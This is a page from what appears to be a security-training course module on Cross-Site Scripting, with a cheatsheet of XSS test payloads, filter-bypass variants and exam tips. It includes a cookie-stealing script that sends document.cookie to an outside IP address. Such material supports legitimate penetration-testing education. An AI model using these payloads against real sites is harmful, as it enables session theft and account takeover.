Dashboard › Modules › Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS)

Web

> Start Learning

📖 Overview

Finding and exploiting XSS vulnerabilities.

🎯

Exercises

🃏

Flashcards

🗺️

Mind Maps

📋 Cheatsheet

Test Payloads

<script>alert(1)</script> # Basic script tag payload
<img src=x onerror=alert(1)> # Image tag with onerror event
<svg onload=alert(1)> # SVG tag with onload event

Cookie Stealing

<script>new Image().src='http://10.10.14.5/?c='+document.cookie</script> # Steal cookies via image request

Filter Bypass

<ScRiPt>alert(1)</ScRiPt> # Bypass case-sensitive filters
<img src=x onerror=alert`1`> # Bypass parenthesis filters

💻 Command Examples

⚠️ Common Pitfalls

Not testing all inputs
Missing stored XSS

💡 Exam Survival Tips

Check reflected and stored
Look for DOM-based XSS

🎯 Exercises

View All

fill command easy

Write an XSS payload that triggers an alert:...

🗺️ Mind Maps

XSS Attack Methodology

Save Your Progress

Cross-Site Scripting (XSS)

📖 Overview

📋 Cheatsheet

Test Payloads

Cookie Stealing

Filter Bypass

💻 Command Examples

⚠️ Common Pitfalls

💡 Exam Survival Tips

🎯 Exercises

🗺️ Mind Maps